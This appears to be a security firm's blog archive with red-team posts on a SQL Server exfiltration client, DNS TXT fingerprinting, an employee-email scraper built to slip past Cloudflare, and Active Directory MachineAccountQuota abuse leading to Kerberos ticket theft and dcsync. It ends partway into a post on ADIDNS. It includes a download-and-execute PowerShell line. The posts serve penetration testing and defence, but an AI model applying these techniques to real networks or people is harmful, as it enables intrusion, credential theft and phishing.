
Evil SQL Client Console: Msbuild All the Things

Esc Logo

Evil SQL Client (ESC) is an interactive .NET SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. While ESC can be a handy SQL client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, as well as sample files for execution through mediums like MSBuild and PowerShell.

This blog will provide a quick overview of the tool. For those who just want the code, it can be downloaded from https://github.com/NetSPI/ESC.

Why another SQL Server attack client?

PowerUpSQL and DAFT (a fantastic .NET port of PowerUpSQL written by Alexander Leary) are great tool sets, but during red team engagements they can be a little too visible. So to stay under the radar, we initially created a series of standalone .NET functions that could be executed via alternative mediums like MSBuild inline tasks. Following that, we had a few clients request data exfiltration from SQL Server using similar evasion techniques. So we created the Evil SQL Client console to help make the testing process faster and the report screenshots easier to understand 🙂 .

Summary of Executions Options

The Evil SQL Client console and functions can be run via:

  • Esc.exe is the original application, created in Visual Studio.
  • Esc.csproj is an MSBuild script that loads .NET code directly through inline tasks (a sample invocation follows this list). This technique was researched and popularized by Casey Smith (@subTee). There is a nice article on detection worth reading by Steve Cooper (@BleepSec) here.
  • Esc.xml is also an MSBuild script that uses inline tasks, but it loads the actual esc.exe assembly through reflection. This technique was shared by @bohops in his GhostBuild project. It also leverages work done by @mattifestation.
  • Esc-example.ps1 PowerShell script: Loads esc.exe through reflection.  This specific script was generated using Out-CompressDll by @mattifestation.
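As a point of reference, executing the .csproj version is just a matter of pointing msbuild.exe at the project file. The paths below are examples and should be adjusted for the target system:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\temp\esc.csproj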

Below is a simple screenshot of the Evil SQL Client console executed via esc.exe:

Start Esc Compile

Below is a simple screenshot of the Evil SQL Client console being executed through MSBuild:

Esc Msbuild

Summary of Features/Commands

At the moment, ESC does not have full feature parity with PowerUpSQL or DAFT, but the most useful bits are there. Below is a summary of the features that do exist.

  • Discovery: Discover file, Discover domainspn, Discover broadcast, Show discovered, Export discovered
  • Access: Check access, Check defaultpw, Show access, Export access
  • Gather: Single instance query, Multi instance query, List serverinfo, List databases, List tables, List links, List logins, List rolemembers, List privy
  • Escalate: Check loginaspw, Check uncinject, Run oscmd
  • Exfil*: Set File, Set FilePath, Set icmp, Set icmpip, Set http, Set httpurl

*All query results are exfiltrated via all enabled methods.

For more information on available commands visit: https://github.com/NetSPI/ESC/blob/master/README.md#supportedcommands
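To give a feel for the workflow, a hypothetical console session chaining a few of the commands from the summary above might look like the following (the query argument is illustrative; see the README for exact usage):

discover domainspn
show discovered
check access
single instance query select @@version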

Wrap Up

Hopefully, the Evil SQL Client console will prove useful on engagements and help illustrate the need for a larger time investment in detective control development surrounding MSBuild inline task execution, SQL Server attacks, and basic data exfiltration. For more information regarding the Evil SQL Client (ESC), please visit the GitHub project.

There are plenty of additional resources available to get you started on building detections for common malicious MSBuild and SQL Server use.

Good luck and hack responsibly!


Analyzing DNS TXT Records to Fingerprint Online Service Providers

DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company.

In this blog I’ll walk through how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint.


Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”.

Below is an outline of how that process typically works:

  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.

It’s really that last step that everyone seems to forget to do, and that’s why simple DNS queries can be so useful for gaining insight into what online service providers companies are using.
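For a quick manual spot check of a single domain, a one-liner like the following will surface any leftover tokens (example.com is a placeholder):

# List the TXT record strings for a single domain
Resolve-DnsName -Type TXT example.com | Select-Object -ExpandProperty Strings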

Note: The domain validation process doesn’t always require a DNS TXT entry.  Some online service providers simply request that you upload a text file containing the domain validation token to the webroot of the domain’s website.  For example, https://mywebsite.com/validation_12345.txt.  Google dorking can be a handy way to find those instances if you know what you’re looking for, but for now let’s stay focused on DNS records.

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites. I used a slightly older list, but for those looking to mine that information on a recurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security focused tools like dnsrecon. I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊 It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites.

Below is the basic collection script I used.

# Import list of domains
$Domains = gc C:\temp\domains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:

  1. Removed remaining SPF records
  2. Parsed key value pairs (see the sketch after this list)
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts
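Below is a rough sketch of the parsing and grouping steps; it assumes the dnstxt-records.csv file generated by the collection script above, and the parsing is intentionally naive:

# Parse key/value pairs from the collected TXT strings and group by key
Import-Csv dnstxt-records.csv |
ForEach-Object {
    # Most tokens use "key=value"; a few providers use "key: value"
    $key, $value = $_.txtstring -split '[=:]', 2
    [pscustomobject]@{Name = $_.name; Key = $key.Trim(); Value = $value}
} |
Group-Object Key |
Sort-Object Count -Descending |
Select-Object Count, Name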

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation.

Below are the top 5 categories:

  1. Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
  2. Certificate Authorities like GlobalSign were a close second.
  3. Electronic Document Signing providers like Adobe Sign and DocuSign hang around third place.
  4. Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
  5. Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.

There are many other types of services that range from caching services like Cloudflare to security services like “Have I Been Pwned”, but the categories above seem to be the most ubiquitous. It’s also worth noting that I removed SPF records, because technically they are not domain validation tokens. However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren’t managed well. Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.

COUNT | PROVIDER | CATEGORY | EXAMPLE TOKEN
149785 | gmail.com | Cloud Services | google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 | Microsoft Office 365 | Cloud Services | ms=hash
16028 | facebook.com | Cloud Services | facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 | globalsign.com | Certificate Authority | _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 | Adobe Enterprise Services | Electronic Signing, Cloud Services | adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 | Amazon Simple Email | Cloud Services | amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 | globalsign.com | Certificate Authority | globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO–GxX7laTgCizBTW
3486 | Atlassian services | Collaboration | atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 | mailru | Cloud Services | mailru-verification: fa868a61bb236ae5
2698 | yandex.com | Cloud Services | yandex-verification=fb9a7e8303137b4c
2429 | Pardot (Salesforce) | Marketing and Analytics | pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 | docusign.com | Electronic Signing | docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 | Webex | Collaboration | webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 | www.sendinblue.com | Marketing and Analytics | Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 | zoho.com | Email | zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 | dropbox.com | Collaboration | dropbox-domain-verification=zsp1beovavgv
675 | webex.com | Collaboration | ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 | Spiceworks.com | Security | workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 | haveibeenpwned.com | Security | have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
577 | citrix.com | Collaboration | citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 | brave.com | Collaboration | brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 | Adobe Sign / Document Cloud | Electronic Signing | adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 | Firebase (Google) | Development and Publishing | firebase=solar-virtue-511
384 | O365 | Cloud Services | mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 | loader.io | Security | loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I’ve written a PowerShell function called “Resolve-DnsDomainValidationToken”.  You can simply provide it domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created.  Currently it supports parameters for a single domain, a list of domains, or a list of URLs.

Resolve-DnsDomainValidationToken can be downloaded HERE.

Command Example

To give you an idea of what the commands and output look like I’ve provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.

# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results

Domain Validation Token Fingerprint

For those of you that don’t like staring at the console, the results can also be viewed using Out-GridView.

# View record in the out-grid view
$Results | Out-GridView

Domain Validation Token Fingerprint Gridview

Finally, the command also automatically creates two csv files that contain the results:

  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could be fingerprinted.

Domain Validation Token Fingerprint Csv

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we’ve used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testers Use Cases

  1. Services that Support Federated Authentication without MFA
    This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company’s Active Directory deployment.  In many cases they aren’t configured with multi-factor authentication (MFA).  Common examples include Office 365, AWS, G Suite, and Github.

    Pro Tip: Once you’ve authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names.  You can do that with Karl’s Get-AzureDomainInfo.ps1 script.

  2. Subdomain Hijacking Targets
    The domain validation tokens could reveal services that support subdomains, which can be hijacked once the associated CNAME records go stale. For more information on common techniques, Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel
    Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity
    When reviewing domain validation tokens for all of the domains owned by an organization it’s possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:

    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they use 3rd party marketing and analytics? If so, who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certificates? How are they used?
    5. What mail protection services are they using? What are those default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example,
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and encrypted base64 values that could potentially be cracked offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest,  or internal audit.  Good luck and hack responsibly!


Collecting Contacts from zoominfo.com

For our client engagements, we are constantly searching for new methods of open source intelligence (OSINT) gathering. This post will specifically focus on targeting client contact collection from a site we have found to be very useful (zoominfo.com) and will describe some of the hurdles we needed to overcome to write automation around site scraping. We will also be demoing and publishing a simple script to hopefully help the community add to their OSINT arsenal.

Reasons for Gathering Employee Names

The benefits of employee name collection via OSINT are well-known within the security community. Several awesome automated scrapers already exist for popular sources (*cough* LinkedIn *cough*). A scraper is a common term used to describe a script or program that parses specific information from a webpage, often from an unauthenticated perspective. The employee names scraped (collected/parsed) from OSINT sources can trivially be converted into email addresses and/or usernames if one already knows the target organization’s formats. Common formats are pretty intuitive, but below are a few examples.

Name example: Jack B. Nibble

[screenshot: example email address formats]

On the offensive side, a few of the most popular use cases for these collections of employee names, emails, and usernames are:

  • Credential stuffing
  • Email phishing
  • Password spraying

Credential stuffing utilizes breach data sources in an attempt to log into a target organization’s employees’ accounts. These attacks rely on the stolen credentials being recycled by employees on the compromised platforms, e.g., Jack B. Nibble used his work email address with the password JackisGreat10! to sign up for LinkedIn before a breach and he is reusing the same credentials for his work account.

Email phishing has long been one of the easiest ways to breach an organization’s perimeter, typically needing just one user to fall victim to a malicious email.

Password spraying aims to take the employee names gathered via OSINT, convert them into emails/usernames, and attempt to use them in password guessing attacks against single factor (typically) management interfaces accessible from the internet.

During password spraying campaigns, attackers will guess very common passwords – think Password19 or Summer19. The goal of these password sprays is to yield at least one correct employee login, granting the attacker unauthorized access to the target organization’s network/resources in the context of the now compromised employee. The techniques described here are not only utilized by ethical security professionals to demonstrate risk, they are actively being exploited by state-sponsored cyber actors.


Issues with Scraping

With the basic primer out of the way, let’s talk about scraping in general as we lead into the actual script. The concepts discussed here will be specific to our example but can also be applied to similar scenarios. At their core, all web scrapers need to craft HTTP requests and parse responses for the desired information (Burp Intruder is great for ad-hoc scraping). All of the heavy lifting in our script will be done with Python3 and a few libraries.

Some of the most common issues we’ve run into while scraping OSINT sources are:

  • Throttling (temporary slow-downs based on request rate)
  • Rate-limiting (temporary blocking based on request rate)
  • Full-blown bans (permanent blocking based on request rate)

While implementing our scraper for zoominfo.com, our biggest hurdle was throttling and ultimately rate-limiting. The site employs a very popular DDoS protection and mitigation framework in Cloudflare’s I’m Under Attack Mode (IUAM). The goal of IUAM is to detect if a site is being actively attacked by a botnet that is attempting to take the site offline. If Cloudflare decides a person is accessing multiple different pages on a website too rapidly, IUAM will send a JavaScript challenge to that person’s browser.

As part of normal browsing activity via web browser, this challenge would be automatically solved, a cookie would be set, and the user would go about their merry way. The issue arises when we are using an automated script that cannot process JavaScript and does not automatically set the correct cookies. At this point, IUAM would hold our script hostage and it would not be able to continue scraping. For our purposes, we will call this throttling. Another issue arises if we are able to solve the IUAM challenge but are still crossing Cloudflare’s acceptable thresholds for number of requests made within certain time frames. When we cross that threshold, we are hit with a 429 response from the application, which is the HTTP status code for Too Many Requests. We will refer to this as rate-limiting. Pushing even faster may result in a full-blown ban, so we will not poke Cloudflare too hard with our scraper.

Dealing with Throttling and Rate-limiting

In our attempts to push the script forward, we needed to overcome throttling and rate-limiting to successfully scrape. During initial tests, we noticed simple delays via sleep statements within our script would prevent the IUAM from kicking in, but only for a short while. Eventually IUAM would take notice of us, so sleep statements alone would not scale well for most of our needs. Our next thought was to implement Tor, and just switch exit nodes each time we noticed a ban. The Tor Stem library was perfect for this, with built-in control for identifying and programmatically switching exit nodes via Python. Unfortunately, after implementing this idea, we realized zoominfo.com would not accept connections via Tor exit nodes. Another simple option would have been to use other VPN services or even to switch between VPSs, but again, this would not scale well for our purposes.

I had considered spinning up an invisible or headless browser that could interact with the site and process the JavaScript. In this way, Cloudflare (and hopefully any of our future targets) would only see a ‘normal’ browser interacting with their content, thus avoiding our throttling issues. While working to implement this idea, I was pointed instead to an awesome Python library called cloudscraper: https://pypi.org/project/cloudscraper/.

The cloudscraper library does all the heavy lifting of interacting with the JavaScript challenges and allows our scraper to continue while avoiding throttling. We are then only left with the issue of potential rate-limiting. To avoid this, our script also has built-in delays in an attempt to appease Cloudflare. We haven’t come up with an exact science behind this, but it appears that a delay of sixty seconds every ten requests is enough to avoid rate-limiting, with short random delays sprinkled in between each request for good measure.

python3 zoominfo-scraper.py -z netspi-llc/36078304 -d netspi.com

[*] Requesting page 1
[+] Found! Parsing page 1
[*] Random sleep break to appease CloudFlare
[*] Requesting page 2
[+] Found! Parsing page 2
[*] Random sleep break to appease CloudFlare
[*] Requesting page 3
[+] Site returned status code:  410
[+] We seem to be at the end! Yay!
[+] Printing email address list
adolney@netspi.com
ajones@netspi.com
aleybourne@netspi.com

..output truncated..

[+] Found 49 names!

Preventing Automated Scrapers

Vendors or website owners concerned about automated scraping of their content should consider placing any information they deem ‘sensitive’ behind authentication walls. The goal of Cloudflare’s IUAM is to prevent DDoS attacks (which we are vehemently not attempting), with the roadblocks it brings to automated scrapers being just an added bonus. Roadblocks such as this should not be considered a safeguard against automated scrapers that play by the rules.

Download zoominfo-scraper.py

This script is not intended to be all-encompassing for your OSINT gathering needs, but rather a minor piece that we have not had a chance to bolt on to a broader toolset. We are presenting it to the community because we have found a lot of value with it internally and hope to help further advance the security community. Feel free to integrate these concepts or even the script into your own toolsets.

The script and full instructions for use can be found here: https://github.com/NetSPI/HTTPScrapers/tree/master/Zoominfo


MachineAccountQuota is USEFUL Sometimes: Exploiting One of Active Directory's Oddest Settings

MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain. My first run-in with MAQ was way back in my days as a network administrator on a new job. I was assigned the task of joining a remote location’s systems to AD. After adding 10, I received this message on my next attempt:

Maqerror

Researching the error message led me to ms-DS-MachineAccountQuota. The details lined up with the unprivileged AD access I had been provided. I reached out to a fellow admin and explained the situation. He wasn’t familiar with how to increase the quota for my account. Instead, he provided me with a domain admin account to continue working (privesc!).

Powermad

In late 2017, I released Powermad, which is a collection of PowerShell functions derived from an LDAP domain join packet capture. After digging through the packets, I identified the single encrypted LDAP add that created the machine account object. Here is an example of the LDAP add in an unencrypted state:

Maqldapadd

My main motivation while developing Powermad was to more easily incorporate MAQ during testing. In the past, I had seen testers leverage MAQ by attaching a full Windows OS to a domain. Rather than only using MAQ in this way, I wanted to be able to just add a machine account (aka computer account) set with a known password.

Maqnew
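For reference, adding a machine account with a known password through Powermad looks roughly like the following; the account name and password are placeholders:

# Create a machine account named "test" with a known password
$password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
New-MachineAccount -MachineAccount test -Password $password -Verbose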

So Is MachineAccountQuota Useful?

Since I first started working on Powermad, I’ve learned a lot about MAQ beyond just the default 10 system limit. Recently, I’ve learned even more from some amazing blog posts by Elad Shamir, Harmj0y, and Dirk-jan, in which MAQ makes an appearance.

Overall, the conclusion I’ve reached is that MachineAccountQuota is useful…

Sciencemaq

…sometimes.

In this blog post, I’ll go through 10 rules for working with MAQ as an attacker. I wrote these rules from the perspective of just adding a machine account to AD rather than attaching a Windows OS. Later, I’ll apply some of the rules to a MAQ + Kerberos unconstrained delegation use case. Finally, I’ll address defending against MAQ related exploits (spoiler: set to 0).

What Are The Rules?

I’ve broken up what I know about MAQ into 10 rules. Hopefully, you can use these rules to determine if MAQ can be useful in any particular situation.

  1. MAQ allows unprivileged users to add machine account objects to a domain. By default, an unprivileged user can create 10 machine accounts.

    Maqdefault

    You do not need to do anything special to invoke MAQ. You can simply attempt to add a machine account using an account that has not been directly granted the domain join privilege.
  2. The creator account’s SID is stored in the machine account’s ms-DS-CreatorSID attribute. AD populates this attribute only when the creator is not an administrator, or has not been delegated the privilege to add machine accounts.

    Maqcreatorsid

    AD also uses ms-DS-CreatorSID to calculate the current count against MAQ. From a testing perspective, keep in mind the attribute is an arrow pointing to the creator account, even with nested MAQ usage. Therefore, using machine accounts created through MAQ does not fully shield the creator account.

    Maqcreatorsid

    If the defense is aware of the ms-DS-CreatorSID attribute though, there is probably a good chance they have already disabled MAQ.
  3. Machine accounts created through MAQ are placed into the Domain Computers group. In situations where the Domain Computers group has been granted extra privilege, it’s important to remember that this privilege also extends to unprivileged users through MAQ. For example, you may find Domain Computers listed within a local Administrators group.

    Maqlocaladmin

    Or even better, within a Domain Administrators group.

    Maqda

    As a slight extension to this rule, be on the lookout for automation that places computers in OUs and/or groups based on portions of the machine account name. You may be able to leverage the automation through MAQ.
  4. The creator account is granted write access to some machine account object attributes. Normally, this includes the following attributes:
    1. AccountDisabled
    2. description
    3. displayName
    4. DnsHostName
    5. ServicePrincipalName
    6. userParameters
    7. userAccountControl
    8. msDS-AdditionalDnsHostName
    9. msDS-AllowedToActOnBehalfOfOtherIdentity
    10. samAccountName

      You can modify these attributes as needed.
      Maqwrite
      However, the permitted values of some attributes are still subject to validation.

  5. The machine account itself has write access to some of its own attributes. The list includes the msDS-SupportedEncryptionTypes attribute which can have an impact on the negotiated Kerberos encryption method. Modern Windows OS builds will set this attribute to 28 during the process of joining a domain.

    Maqself
  6. The attribute validation is strict at the time the machine account is added. Basically, the attribute values need to match up. If they don’t match, the add will fail such as in this example where the samAccountName is incorrect.
    Maqldapadd
    Strangely, after a machine account is added, some of the validation rules are relaxed.
  7. The samAccountName can be changed to anything that doesn’t match a samAccountName already present in a domain. Changing this attribute can be helpful for blending in activities with legitimate traffic such as by stripping the ‘$’ character or by matching an in-use account naming convention. Interestingly, the samAccountName can even end in a space which permits mimicking any existing domain account.
    Maqsamaccoutnname
    Here is how the fake ‘Administrator’ account appears in action.
    Maqsamaccountname
    Note, changing the samAccountName will not change the actual machine account object name. Therefore, you can have a machine account object that blends in with the naming convention while also having a completely different samAccountName.
  8. Adding a machine account creates 4 SPNs. The list includes the following:
    1. HOST/MachineAccountName
    2. HOST/MachineAccountName.domain.name
    3. RestrictedKrbHost/MachineAccountName
    4. RestrictedKrbhost/MachineAccountName.domain.name

      As an example, here is the default SPN list for the ‘test.inveigh.net’ machine account.
      Maqspn
      After you add the machine account, you can append or replace the list with any SPN that passes validation.
      Maqspn

      If you modify the samAccountName, DnsHostname, or msDS-AdditionalDnsHostName attributes, the SPN list will automatically update with the new values. The default SPNs do cover a lot of use cases though, so you won’t always need to modify the list. If more information on SPNs is needed, Sean Metcalf has a really good list at AdSecurity which includes details on Host and RestrictedKrbHost.

  9. Machine accounts do not have the log on locally privilege. However, machine accounts work just fine from the command line with tools that accept credentials directly or through ‘runas /netonly’. The tasks can include enumeration, adding DNS records, or really just about any non-GUI action that applies to a user account.

    Maqrunas
  10. Machine accounts added through MAQ cannot be deleted by the unprivileged creator account. To completely clean up AD after using MAQ, you will need to elevate domain privilege or pass the task along to your client. You can, however, disable the account with the unprivileged creator account.

    Maqdisable

MachineAccountQuota In Action

Let’s take the above rules and apply them to a compromised AD account that has SeEnableDelegationPrivilege. As mentioned in rule 4, even though an account has write access to an attribute, the write attempt is still subject to validation.

Maqdelegation

However, if you happen to compromise an account with the correct privilege, such as SeEnableDelegationPrivilege, things can get interesting.

Maqdelegation

In this case, we can use the ‘INVEIGH\kevin’ account, along with MAQ, to create and configure a machine account object capable of performing Kerberos unconstrained delegation. Conveniently, this can remove the requirement for finding an existing suitable AD object for leveraging SeEnableDelegationPrivilege. Basically, we can just make our own through MAQ.

Note, this is one of those scenarios where, if you can, just joining a domain with your own Windows system can make things easier. If you do go that route, just enable unconstrained delegation on the machine account object and leverage it just like you would on a compromised system. The good news is that the process is still very manageable when we use only a machine account.

Kerberos Unconstrained Delegation Setup

For this scenario, let’s assume that we have unprivileged access on a random Windows domain system and have also compromised an SeEnableDelegationPrivilege account.

Here are the steps to setup the attack:

  1. Use the SeEnableDelegationPrivilege account to add a machine account through MAQ.

    Maqldapadd

  2. Enable unconstrained delegation by setting the userAccountControl attribute to 528384 (see the sketch after this list).

    Maqdelegation

  3. Optionally, set the msDS-SupportedEncryptionTypes attribute to the desired Kerberos encryption type using the machine account’s credentials.

    Maqencryption

  4. Optionally, add a corresponding DNS record matching the SPNs and pointing to the compromised Windows system. This can usually be done through either dynamic updates or LDAP. This is optional since, with the default SPNs, Kerberos can also be triggered through other name resolution methods such as LLMNR/NBNS.

    Maqadidns
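Below is a minimal sketch of step 2 using Powermad’s Set-MachineAccountAttribute; the machine account name is a placeholder, and the session is assumed to be running as the compromised SeEnableDelegationPrivilege account:

# TRUSTED_FOR_DELEGATION (0x80000) + WORKSTATION_TRUST_ACCOUNT (0x1000) = 528384
Set-MachineAccountAttribute -MachineAccount udel -Attribute userAccountControl -Value 528384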

Kerberos Unconstrained Delegation Attack

With the above in place, we next need to sort out how to get the desired account traffic to the compromised host. For this first round, we’ll use tifkin’s printer bug to get a domain controller machine account to connect to our system over SMB. Additionally, we will be using the dev branch version of Inveigh. Through packet sniffing, this version can grab SMB Kerberos TGT traffic and attempt to output a kirbi file for use with tools such as Mimikatz and Rubeus.

For Inveigh, we will need to have either the unconstrained delegation account’s AES256 hash or a PSCredential object with a Kerberos salt as the username. Shown below is the process of generating the correct AES256 hash using Powermad’s Get-KerberosAESKey function.

Maqaeshash

Note, Inveigh currently only supports AES256 Kerberos decryption.

Since we want to use our unconstrained delegation machine account’s SPN, we will need to have the target connect to the correct host name. For this example, I’ll use Dirk-jan‘s printerbug script from his recently released Krbrelayx toolkit.

Maqprinterbug

At this point, let’s take a step back and go over the various SPNs in play. First, we have a compromised system running an SMB server as SYSTEM. This means that the SMB server will decrypt Kerberos tickets using the system’s machine account credentials. If we cause an SPN mismatch and attempt to perform Kerberos authentication with data encrypted under a different SPN, the SMB authentication will fail. However, the SMB server will not reject the authentication attempt until after the client has transmitted the AP-REQ.

Maqsmb

More importantly for this scenario, the SMB server will reject the connection after receiving the TGT. Therefore, if we can grab the Kerberos traffic through packet sniffing, we can decrypt the needed data with the machine account credentials we have in our possession.

Maqinveigh

Note, using the SPN mismatch trick has a tendency to trigger multiple Kerberos authentication attempts from a client. I have Inveigh set to only output 2 kirbi files per user by default. Inveigh stores the rest in memory for access through Get-Inveigh.

Now that we have a kirbi TGT for the domain controller, we can pass it to Mimikatz and attempt a dcsync.

Maqmimikatz

For another quick example, I used Inveigh to capture a Domain Administrator TGT over SMB.

Maqkirbi

Next, I used the kirbi file with Rubeus.

Maqrubeus

As a last example, below is Inveigh catching a TGT over HTTP.

Maqinveighhttp

HTTP may, in ideal conditions, remove the requirement for local administrator access on the compromised system.

Finally, the Kerberos unconstrained delegation technique above would also work well with the new krbrelayx toolkit.

One last word on SeEnableDelegationPrivilege + MAQ: fully setting up standard constrained delegation is usually out of reach due to the lack of write access to msDS-AllowedToDelegateTo.

Defending Against MachineAccountQuota

I believe that MAQ is just one of those default settings without enough awareness. I’m guessing companies rarely actually need the default MAQ setting, or even need it enabled at all. To disable MAQ, simply set the count to 0, as shown below. If you do need to allow unprivileged users to add systems, the better route is to delegate the privilege to specific groups. Just be aware that much of what is listed in this blog post would also apply to a compromised account with delegated domain join privilege.
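For example, with the ActiveDirectory PowerShell module, the change might look like this (the domain name is a placeholder):

# Set ms-DS-MachineAccountQuota to 0 for the domain
Set-ADDomain -Identity inveigh.net -Replace @{"ms-DS-MachineAccountQuota"="0"}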

Defenders can also keep an eye out for two things:

  • Populated ms-DS-CreatorSID attributes
  • Machine accounts that are not changing their passwords

Conclusion

As with most things, MachineAccountQuota usage is situational. For testers, it is however something that is worthy of consideration for your bag of tricks. This has become even more apparent with recently released techniques from researchers such as Elad Shamir. For defenders, I recommend just disabling MachineAccountQuota.

Special thanks to Karl Fosaaen for the Always Sunny photoshop.


ADIDNS Revisited – WPAD, GQBL, and More

A few months ago, I wrote a blog post on exploiting Active Directory-Integrated DNS (ADIDNS). This post will mainly cover some additional techniques on both the offensive and defensive fronts. I would suggest at least skimming the original post before continuing here.

Wildcardrevisited

With that out of the way, I’d like to start by adding in another well known and problematic default setting related to name resolution that I left out of the original post.

So What About WPAD?

